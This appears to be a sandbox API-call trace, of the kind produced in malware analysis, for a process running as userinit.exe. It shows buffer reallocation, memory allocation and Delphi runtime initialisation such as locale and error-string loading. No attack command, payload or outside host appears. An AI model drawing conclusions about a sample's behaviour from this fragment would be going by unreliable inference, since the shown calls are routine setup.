[0129.025] GlobalHandle (pMem=0x2740020) returned 0x38000c
[0129.025] GlobalUnlock (hMem=0x38000c) returned 0
[0129.025] GlobalReAlloc (hMem=0x38000c, dwBytes=0xbc000, uFlags=0x2) returned 0x38000c
[0129.041] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.042] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.042] GlobalUnlock (hMem=0x38000c) returned 0
[0129.042] GlobalReAlloc (hMem=0x38000c, dwBytes=0xbe000, uFlags=0x2) returned 0x38000c
[0129.058] GlobalLock (hMem=0x38000c) returned 0x2740020
[0129.059] GlobalHandle (pMem=0x2740020) returned 0x38000c
[0129.059] GlobalUnlock (hMem=0x38000c) returned 0
[0129.059] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc0000, uFlags=0x2) returned 0x38000c
[0129.123] GlobalLock (hMem=0x38000c) returned 0x2800020
[0129.124] GlobalHandle (pMem=0x2800020) returned 0x38000c
[0129.124] GlobalUnlock (hMem=0x38000c) returned 0
[0129.124] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc2000, uFlags=0x2) returned 0x38000c
[0129.141] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.142] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.142] GlobalUnlock (hMem=0x38000c) returned 0
[0129.142] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc4000, uFlags=0x2) returned 0x38000c
[0129.158] GlobalLock (hMem=0x38000c) returned 0x2750020
[0129.159] GlobalHandle (pMem=0x2750020) returned 0x38000c
[0129.159] GlobalUnlock (hMem=0x38000c) returned 0
[0129.159] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc6000, uFlags=0x2) returned 0x38000c
[0129.223] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.223] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.223] GlobalUnlock (hMem=0x38000c) returned 0
[0129.224] GlobalReAlloc (hMem=0x38000c, dwBytes=0xc8000, uFlags=0x2) returned 0x38000c
[0129.240] GlobalLock (hMem=0x38000c) returned 0x2750020
[0129.241] GlobalHandle (pMem=0x2750020) returned 0x38000c
[0129.241] GlobalUnlock (hMem=0x38000c) returned 0
[0129.241] GlobalReAlloc (hMem=0x38000c, dwBytes=0xca000, uFlags=0x2) returned 0x38000c
[0129.306] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.307] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.307] GlobalUnlock (hMem=0x38000c) returned 0
[0129.307] GlobalReAlloc (hMem=0x38000c, dwBytes=0xcc000, uFlags=0x2) returned 0x38000c
[0129.323] GlobalLock (hMem=0x38000c) returned 0x2750020
[0129.324] GlobalHandle (pMem=0x2750020) returned 0x38000c
[0129.324] GlobalUnlock (hMem=0x38000c) returned 0
[0129.324] GlobalReAlloc (hMem=0x38000c, dwBytes=0xce000, uFlags=0x2) returned 0x38000c
[0129.341] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.342] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.342] GlobalUnlock (hMem=0x38000c) returned 0
[0129.342] GlobalReAlloc (hMem=0x38000c, dwBytes=0xd0000, uFlags=0x2) returned 0x38000c
[0129.410] GlobalLock (hMem=0x38000c) returned 0x2750020
[0129.411] GlobalHandle (pMem=0x2750020) returned 0x38000c
[0129.411] GlobalUnlock (hMem=0x38000c) returned 0
[0129.411] GlobalReAlloc (hMem=0x38000c, dwBytes=0xd2000, uFlags=0x2) returned 0x38000c
[0129.431] GlobalLock (hMem=0x38000c) returned 0x2830020
[0129.432] GlobalHandle (pMem=0x2830020) returned 0x38000c
[0129.432] GlobalUnlock (hMem=0x38000c) returned 0
[0129.432] GlobalReAlloc (hMem=0x38000c, dwBytes=0xd4000, uFlags=0x2) returned 0x38000c
[0129.498] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.499] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.499] GlobalUnlock (hMem=0x38000c) returned 0
[0129.499] GlobalReAlloc (hMem=0x38000c, dwBytes=0xd6000, uFlags=0x2) returned 0x38000c
[0129.516] GlobalLock (hMem=0x38000c) returned 0x2760020
[0129.517] GlobalHandle (pMem=0x2760020) returned 0x38000c
[0129.517] GlobalUnlock (hMem=0x38000c) returned 0
[0129.517] GlobalReAlloc (hMem=0x38000c, dwBytes=0xd8000, uFlags=0x2) returned 0x38000c
[0129.535] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.582] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.582] GlobalUnlock (hMem=0x38000c) returned 0
[0129.582] GlobalReAlloc (hMem=0x38000c, dwBytes=0xda000, uFlags=0x2) returned 0x38000c
[0129.603] GlobalLock (hMem=0x38000c) returned 0x2760020
[0129.604] GlobalHandle (pMem=0x2760020) returned 0x38000c
[0129.604] GlobalUnlock (hMem=0x38000c) returned 0
[0129.604] GlobalReAlloc (hMem=0x38000c, dwBytes=0xdc000, uFlags=0x2) returned 0x38000c
[0129.627] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.628] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.628] GlobalUnlock (hMem=0x38000c) returned 0
[0129.628] GlobalReAlloc (hMem=0x38000c, dwBytes=0xde000, uFlags=0x2) returned 0x38000c
[0129.693] GlobalLock (hMem=0x38000c) returned 0x2760020
[0129.694] GlobalHandle (pMem=0x2760020) returned 0x38000c
[0129.694] GlobalUnlock (hMem=0x38000c) returned 0
[0129.694] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe0000, uFlags=0x2) returned 0x38000c
[0129.712] GlobalLock (hMem=0x38000c) returned 0x2840020
[0129.713] GlobalHandle (pMem=0x2840020) returned 0x38000c
[0129.713] GlobalUnlock (hMem=0x38000c) returned 0
[0129.713] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe2000, uFlags=0x2) returned 0x38000c
[0129.779] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.779] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.779] GlobalUnlock (hMem=0x38000c) returned 0
[0129.780] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe4000, uFlags=0x2) returned 0x38000c
[0129.798] GlobalLock (hMem=0x38000c) returned 0x2770020
[0129.799] GlobalHandle (pMem=0x2770020) returned 0x38000c
[0129.799] GlobalUnlock (hMem=0x38000c) returned 0
[0129.799] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe6000, uFlags=0x2) returned 0x38000c
[0129.866] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.866] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.867] GlobalUnlock (hMem=0x38000c) returned 0
[0129.867] GlobalReAlloc (hMem=0x38000c, dwBytes=0xe8000, uFlags=0x2) returned 0x38000c
[0129.885] GlobalLock (hMem=0x38000c) returned 0x2770020
[0129.886] GlobalHandle (pMem=0x2770020) returned 0x38000c
[0129.886] GlobalUnlock (hMem=0x38000c) returned 0
[0129.886] GlobalReAlloc (hMem=0x38000c, dwBytes=0xea000, uFlags=0x2) returned 0x38000c
[0129.905] GlobalLock (hMem=0x38000c) returned 0x2680020
[0129.906] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0129.906] GlobalUnlock (hMem=0x38000c) returned 0
[0129.906] GlobalReAlloc (hMem=0x38000c, dwBytes=0xec000, uFlags=0x2) returned 0x38000c
[0129.973] GlobalLock (hMem=0x38000c) returned 0x2770020
[0129.974] GlobalHandle (pMem=0x2770020) returned 0x38000c
[0129.974] GlobalUnlock (hMem=0x38000c) returned 0
[0129.974] GlobalReAlloc (hMem=0x38000c, dwBytes=0xee000, uFlags=0x2) returned 0x38000c
[0130.052] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.052] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.053] GlobalUnlock (hMem=0x38000c) returned 0
[0130.053] GlobalReAlloc (hMem=0x38000c, dwBytes=0xf0000, uFlags=0x2) returned 0x38000c
[0130.072] GlobalLock (hMem=0x38000c) returned 0x2770020
[0130.073] GlobalHandle (pMem=0x2770020) returned 0x38000c
[0130.073] GlobalUnlock (hMem=0x38000c) returned 0
[0130.073] GlobalReAlloc (hMem=0x38000c, dwBytes=0xf2000, uFlags=0x2) returned 0x38000c
[0130.093] GlobalLock (hMem=0x38000c) returned 0x2870020
[0130.094] GlobalHandle (pMem=0x2870020) returned 0x38000c
[0130.094] GlobalUnlock (hMem=0x38000c) returned 0
[0130.094] GlobalReAlloc (hMem=0x38000c, dwBytes=0xf4000, uFlags=0x2) returned 0x38000c
[0130.124] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.125] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.125] GlobalUnlock (hMem=0x38000c) returned 0
[0130.125] GlobalReAlloc (hMem=0x38000c, dwBytes=0xf6000, uFlags=0x2) returned 0x38000c
[0130.182] GlobalLock (hMem=0x38000c) returned 0x2780020
[0130.183] GlobalHandle (pMem=0x2780020) returned 0x38000c
[0130.183] GlobalUnlock (hMem=0x38000c) returned 0
[0130.183] GlobalReAlloc (hMem=0x38000c, dwBytes=0xf8000, uFlags=0x2) returned 0x38000c
[0130.204] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.205] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.205] GlobalUnlock (hMem=0x38000c) returned 0
[0130.205] GlobalReAlloc (hMem=0x38000c, dwBytes=0xfa000, uFlags=0x2) returned 0x38000c
[0130.297] GlobalLock (hMem=0x38000c) returned 0x2780020
[0130.298] GlobalHandle (pMem=0x2780020) returned 0x38000c
[0130.298] GlobalUnlock (hMem=0x38000c) returned 0
[0130.298] GlobalReAlloc (hMem=0x38000c, dwBytes=0xfc000, uFlags=0x2) returned 0x38000c
[0130.318] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.319] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.319] GlobalUnlock (hMem=0x38000c) returned 0
[0130.319] GlobalReAlloc (hMem=0x38000c, dwBytes=0xfe000, uFlags=0x2) returned 0x38000c
[0130.340] GlobalLock (hMem=0x38000c) returned 0x2780020
[0130.341] GlobalHandle (pMem=0x2780020) returned 0x38000c
[0130.341] GlobalUnlock (hMem=0x38000c) returned 0
[0130.341] GlobalReAlloc (hMem=0x38000c, dwBytes=0x100000, uFlags=0x2) returned 0x38000c
[0130.362] GlobalLock (hMem=0x38000c) returned 0x2880020
[0130.363] GlobalHandle (pMem=0x2880020) returned 0x38000c
[0130.363] GlobalUnlock (hMem=0x38000c) returned 0
[0130.363] GlobalReAlloc (hMem=0x38000c, dwBytes=0x102000, uFlags=0x2) returned 0x38000c
[0130.394] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.395] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.395] GlobalUnlock (hMem=0x38000c) returned 0
[0130.395] GlobalReAlloc (hMem=0x38000c, dwBytes=0x104000, uFlags=0x2) returned 0x38000c
[0130.416] GlobalLock (hMem=0x38000c) returned 0x2790020
[0130.417] GlobalHandle (pMem=0x2790020) returned 0x38000c
[0130.417] GlobalUnlock (hMem=0x38000c) returned 0
[0130.417] GlobalReAlloc (hMem=0x38000c, dwBytes=0x106000, uFlags=0x2) returned 0x38000c
[0130.438] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.439] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.439] GlobalUnlock (hMem=0x38000c) returned 0
[0130.439] GlobalReAlloc (hMem=0x38000c, dwBytes=0x108000, uFlags=0x2) returned 0x38000c
[0130.462] GlobalLock (hMem=0x38000c) returned 0x2790020
[0130.463] GlobalHandle (pMem=0x2790020) returned 0x38000c
[0130.463] GlobalUnlock (hMem=0x38000c) returned 0
[0130.463] GlobalReAlloc (hMem=0x38000c, dwBytes=0x10a000, uFlags=0x2) returned 0x38000c
[0130.484] GlobalLock (hMem=0x38000c) returned 0x2680020
[0130.485] GlobalHandle (pMem=0x2680020) returned 0x38000c
[0130.485] GlobalUnlock (hMem=0x38000c) returned 0
[0130.485] GlobalReAlloc (hMem=0x38000c, dwBytes=0x10c000, uFlags=0x2) returned 0x38000c
[0130.507] GlobalLock (hMem=0x38000c) returned 0x2790020
[0130.508] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2680000
[0130.508] VirtualAlloc (lpAddress=0x2680000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2680000
[0130.546] GetKeyboardType (nTypeFlag=0) returned 4
[0130.546] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.546] GetStartupInfoA (in: lpStartupInfo=0x8f820 | out: lpStartupInfo=0x8f820*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0130.546] GetVersion () returned 0x1db10106
[0130.546] GetVersion () returned 0x1db10106
[0130.546] GetCurrentThreadId () returned 0x764
[0130.546] GetModuleFileNameA (in: hModule=0x28a0000, lpFilename=0x8f31c, nSize=0x105 | out: lpFilename=",ó\x08" (normalized: "c:\\windows\\system32\\,ó\x08")) returned 0x0
[0130.546] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8f1f7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.547] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f30c | out: phkResult=0x8f30c*=0x0) returned 0x2
[0130.547] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f30c | out: phkResult=0x8f30c*=0x0) returned 0x2
[0130.547] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f30c | out: phkResult=0x8f30c*=0x0) returned 0x2
[0130.547] lstrcpynA (in: lpString1=0x8f1f7, lpString2=",ó\x08", iMaxLength=261 | out: lpString1=",ó\x08") returned=",ó\x08"
[0130.547] GetThreadLocale () returned 0x409
[0130.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x8f307, cchData=5 | out: lpLCData="ENU") returned 4
[0130.547] lstrlenA (lpString=",ó\x08") returned 3
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffc4, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0130.547] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xcdcc0
[0130.547] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x29c0000
[0130.547] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xcecc0
[0130.547] VirtualAlloc (lpAddress=0x29c0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x29c0000
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffc3, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffc1, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffc2, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffd4, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffdd, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0130.547] LoadStringA (in: hInstance=0x28a0000, uID=0xffd3, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffd0, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffd7, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffd6, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe8, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe9, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffea, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe7, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe5, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe3, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe2, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe1, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe0, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffff, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfffe, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfffd, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfffc, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfffb, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfffa, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfff9, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfff8, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfff7, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfff6, lpBuffer=0x8f440, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xfff4, lpBuffer=0x8f42c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0130.548] LoadStringA (in: hInstance=0x28a0000, uID=0xffe4, lpBuffer=0x8f42c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0130.548] GetVersionExA (in: lpVersionInformation=0x8f7c4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28a0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x8a\x02·\"\x8a\x02\\ø\x08") | out: lpVersionInformation=0x8f7c4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0130.548] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.549] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0130.549] GetThreadLocale () returned 0x409
[0130.549] GetThreadLocale () returned 0x409
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Jan") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x8f69c, cchData=256 | out: lpLCData="January") returned 8
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Feb") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x8f69c, cchData=256 | out: lpLCData="February") returned 9
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Mar") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x8f69c, cchData=256 | out: lpLCData="March") returned 6
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Apr") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x8f69c, cchData=256 | out: lpLCData="April") returned 6
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x8f69c, cchData=256 | out: lpLCData="May") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x8f69c, cchData=256 | out: lpLCData="May") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Jun") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x8f69c, cchData=256 | out: lpLCData="June") returned 5
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Jul") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x8f69c, cchData=256 | out: lpLCData="July") returned 5
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Aug") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x8f69c, cchData=256 | out: lpLCData="August") returned 7
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Sep") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x8f69c, cchData=256 | out: lpLCData="September") returned 10
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Oct") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x8f69c, cchData=256 | out: lpLCData="October") returned 8
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Nov") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x8f69c, cchData=256 | out: lpLCData="November") returned 9
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Dec") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x8f69c, cchData=256 | out: lpLCData="December") returned 9
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Sun") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Sunday") returned 7
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Mon") returned 4
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Monday") returned 7
[0130.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Tue") returned 4
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Wed") returned 4
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Thu") returned 4
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Thursday") returned 9
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Fri") returned 4
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Friday") returned 7
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Sat") returned 4
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x8f69c, cchData=256 | out: lpLCData="Saturday") returned 9
[0130.550] GetThreadLocale () returned 0x409
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="$") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="0") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="0") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x8f7f0, cchData=2 | out: lpLCData=",") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x8f7f0, cchData=2 | out: lpLCData=".") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="2") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x8f7f0, cchData=2 | out: lpLCData="/") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0130.550] GetThreadLocale () returned 0x409
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8f6c4, cchData=256 | out: lpLCData="1") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0130.550] GetThreadLocale () returned 0x409
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8f6c4, cchData=256 | out: lpLCData="1") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x8f7f0, cchData=2 | out: lpLCData=":") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="AM") returned 3
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="PM") returned 3
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="0") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="0") returned 2
[0130.550] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x8f6f8, cchData=256 | out: lpLCData="0") returned 2
[0130.551] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x8f7f0, cchData=2 | out: lpLCData=",") returned 2
[0130.551] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
